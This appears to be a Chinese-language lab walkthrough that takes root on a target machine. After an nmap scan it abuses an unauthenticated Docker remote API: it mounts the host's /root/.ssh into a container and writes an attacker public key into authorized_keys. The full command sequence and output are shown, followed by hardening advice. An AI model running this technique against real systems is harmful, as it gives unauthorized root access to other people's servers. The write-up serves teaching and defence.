当前IP:
[root@node01 ~]# ifconfig eth0|sed -n -e '/inet /p'|awk '{print $2}'
192.168.22.68
[root@node01 ~]#
靶机IP:
192.168.86.190
我们先用 nmap 扫一下 靶机开了哪些端口:
[root@node01 ~]# nmap -sS -p 1-65535 192.168.86.190
Starting Nmap 6.40 ( http://nmap.org ) at 2019-12-25 16:40 CST
Nmap scan report for 192.168.86.190
Host is up (0.00034s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
873/tcp open rsync
2375/tcp open unknown //docker 远程端口
3306/tcp filtered mysql
4001/tcp open newoak
7001/tcp open afs3-callback
8080/tcp open http-proxy
60020/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds
[root@node01 ~]#
我们先尝试直接 ssh 登录，此时肯定进不去，因为并不知道对方服务器的密码：
[root@node01 ~]# ssh 192.168.86.190
The authenticity of host '192.168.86.190 (192.168.86.190)' can't be established.
ECDSA key fingerprint is SHA256:Kxx3gBWRj3GLge8LsSOKB3L1oWIdq4ULa/wp0GahYHo.
ECDSA key fingerprint is MD5:98:15:93:35:ef:1a:e6:96:1b:4a:aa:11:d9:19:d3:35.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.86.190' (ECDSA) to the list of known hosts.
root@192.168.86.190's password:
Permission denied, please try again.
root@192.168.86.190's password:
Permission denied, please try again.
root@192.168.86.190's password:
Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password).
[root@node01 ~]#
但靶机貌似开放了 docker 远程 API（2375 端口），能否通过它突破并拿到靶机权限？
思路:
在本机生成密钥对，再通过 docker 的目录映射（-v 挂载靶机目录）把公钥间接写到靶机上，从而实现免密登录。
# 查看下 docker 版本
[root@node01 ~]# docker -H 192.168.86.190 version
Client: Docker Engine - Community
Version: 19.03.5
API version: 1.40
Go version: go1.12.12
Git commit: 633a0ea
Built: Wed Nov 13 07:25:41 2019
OS/Arch: linux/amd64
Experimental: false
Server: Docker Engine - Community
Engine:
Version: 19.03.5
API version: 1.40 (minimum version 1.12)
Go version: go1.12.12
Git commit: 633a0ea
Built: Wed Nov 13 07:24:18 2019
OS/Arch: linux/amd64
Experimental: false
[root@node01 ~]#
# 生成密钥对
[root@node01 ~]# ssh-keygen -t rsa -P ''
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:PZVTEV1rZe2VDqXRkZ8nxtzMRF8wru2SIzyeSflBvXI root@node01
The key's randomart image is:
+---[RSA 2048]----+
| .OO%|
| =o*X|
| +++O=|
| . . =*oB|
| S o o.o..|
| . + o . |
| * * E |
| o * * |
| + . |
+----[SHA256]-----+
[root@node01 ~]# ll /root/.ssh/id_rsa
id_rsa id_rsa.pub
[root@node01 ~]#
[root@node01 ~]# cat /root/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxd11rFQA5lbv3naOKHXIz7/PwFf+w3zGfHgBO50f0Q71V9H2U8CVc+bL43L5jwe1m4ItqQ+kci+1qu0zov80En0GwXNR3AuohDl9QKijHXBYEUhofTeRxsB5s4WVE6zeR2onR3OJxhSP8T1sKAkkqa1bR6h55Ybp+UNNfedNaKSYR+JFi7GAS1/5QTBiYxv+NSUg5MuBFd6c4YZ/X8r0cTZUjqCWZpBrAtbn5XRNsz/31Y4GOXY6M+L/m/yiuE/8+CWrp7buFaQmW57Y2L9dq6ved98cYvrzKG90LbB/Uz7GSns+TtdKldkU1fLmHwcZ7X2u16wy846KZHD2JEM81 root@node01
[root@node01 ~]#
# 远程启动一个容器，并把靶机的 /root/.ssh 目录挂载到容器的 /mnt，以便追加公钥
[root@node01 ~]# docker -H 192.168.86.190 run -it -v /root/.ssh/:/mnt centos /bin/bash
[root@b74d29f82ead /]#
[root@b74d29f82ead /]# echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxd11rFQA5lbv3naOKHXIz7/PwFf+w3zGfHgBO50f0Q71V9H2U8CVc+bL43L5jwe1m4ItqQ+kci+1qu0zov80En0GwXNR3AuohDl9QKijHXBYEUhofTeRxsB5s4WVE6zeR2onR3OJxhSP8T1sKAkkqa1bR6h55Ybp+UNNfedNaKSYR+JFi7GAS1/5QTBiYxv+NSUg5MuBFd6c4YZ/X8r0cTZUjqCWZpBrAtbn5XRNsz/31Y4GOXY6M+L/m/yiuE/8+CWrp7buFaQmW57Y2L9dq6ved98cYvrzKG90LbB/Uz7GSns+TtdKldkU1fLmHwcZ7X2u16wy846KZHD2JEM81 root@node01' >> /mnt/authorized_keys
[root@b74d29f82ead /]# exit
没错，此时已经可以免密以 root 身份登录靶机了：
[root@node01 ~]# ssh 192.168.86.190
Last failed login: Thu Dec 26 09:36:06 CST 2019 from 192.168.22.68 on ssh:notty
There were 6 failed login attempts since the last successful login.
Last login: Wed Dec 4 14:42:44 2019 from 192.168.1.15
[root@localhost ~]# ifconfig eth0|sed -n '/inet /p'|awk '{print $2}'
192.168.86.190
[root@localhost ~]#
总结
尽量不要开启 docker 远程操作；即使开启，也不要对所有来源放行，只针对指定 IP 或内网网段放行，并为远程 API 启用 TLS 客户端证书认证——未经认证的 docker 远程 API 等同于靶机 root，因为容器可以任意挂载宿主机目录（上面正是挂载 /root/.ssh 写入公钥）。其次禁用 root 远程登录，修改默认远程登录端口，创建用户时尽量避免使用弱用户名，比如测试部的 test 等。